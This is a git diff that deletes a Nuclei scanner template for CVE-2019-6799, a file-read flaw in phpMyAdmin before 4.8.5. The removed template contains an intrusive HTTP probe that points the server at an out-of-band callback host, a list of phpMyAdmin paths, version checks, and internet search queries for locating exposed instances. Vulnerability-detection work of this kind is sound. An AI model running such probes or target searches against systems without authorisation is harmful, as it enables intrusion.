diff --git a/http/cves/2019/CVE-2019-6799.yaml b/http/cves/2019/CVE-2019-6799.yaml
deleted file mode 100644
index d0c051afd2..0000000000
--- a/http/cves/2019/CVE-2019-6799.yaml
+++ /dev/null
@@ -1,106 +0,0 @@
-id: CVE-2019-6799
-
-info:
- name: phpMyAdmin <4.8.5 - Local File Inclusion
- author: pwnhxl
- severity: medium
- description: |
- phpMyAdmin before 4.8.5 is susceptible to local file inclusion. When the AllowArbitraryServer configuration setting is set to true, an attacker can read, with the use of a rogue MySQL server, any file on the server that the web server's user can access. This is related to the mysql.allow_local_infile PHP configuration, and the inadvertent ignoring of options(MYSQLI_OPT_LOCAL_INFIL calls.
- impact: |
- Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
- remediation: |
- Upgrade phpMyAdmin to version 4.8.5 or later to mitigate this vulnerability.
- reference:
- - https://paper.seebug.org/1112/#_4
- - https://github.com/phpmyadmin/phpmyadmin/commit/828f740158e7bf14aa4a7473c5968d06364e03a2
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6799
- - https://github.com/rmb122/rogue_mysql_server
- - https://github.com/vulnspy/phpmyadmin-4.8.4-allowarbitraryserver
- - https://nvd.nist.gov/vuln/detail/CVE-2019-6799
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 5.9
- cve-id: CVE-2019-6799
- epss-score: 0.13969
- epss-percentile: 0.95141
- cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*
- metadata:
- verified: true
- max-request: 6
- vendor: phpmyadmin
- product: phpmyadmin
- shodan-query: title:"phpmyadmin"
- fofa-query: body="pma_servername" && body="4.8.4"
- hunter-query: app.name="phpMyAdmin"&&web.body="pma_servername"&&web.body="4.8.4"
- tags: cve,cve2019,phpmyadmin,mysql,lfr,intrusive
-
-http:
- - raw:
- - |
- GET {{path}}?pma_servername={{interactsh-url}}&pma_username={{randstr}}&pma_password={{randstr}}&server=1 HTTP/1.1
- Host: {{Hostname}}
-
- payloads:
- path:
- - /index.php
- - /pma/index.php
- - /pmd/index.php
- - /phpMyAdmin/index.php
- - /phpmyadmin/index.php
- - /_phpmyadmin/index.php
-
- attack: batteringram
- stop-at-first-match: true
-
- matchers-condition: and
- matchers:
- - type: dsl
- dsl:
- - compare_versions(version, '< 4.8.5')
-
- - type: dsl
- dsl:
- - compare_versions(version, '> 3.9.9')
-
- - type: dsl
- dsl:
- - compare_versions(phpversion, '< 7.3.4')
-
- - type: word
- part: interactsh_protocol
- words:
- - dns
-
- - type: word
- words:
- - mysqli_real_connect
-
- - type: word
- words:
- - pma_servername
-
- - type: status
- status:
- - 200
-
- extractors:
- - type: regex
- name: version
- group: 1
- regex:
- - \?v=([0-9.]+)
- internal: true
-
- - type: regex
- group: 1
- regex:
- - \?v=([0-9.]+)
-
- - type: regex
- name: phpversion
- group: 1
- regex:
- - "X-Powered-By: PHP/([0-9.]+)"
- internal: true
- part: header
-# digest: 490a0046304402200a01f97dacfb787968fb2a8f0e996927ce60ce4f802b7e245b61f8401e34de90022064a008fdb8bf243117f0774545b79488f4e514889c23111b2660235d910a19ef:922c64590222798bb761d5b6d8e72950
\ No newline at end of file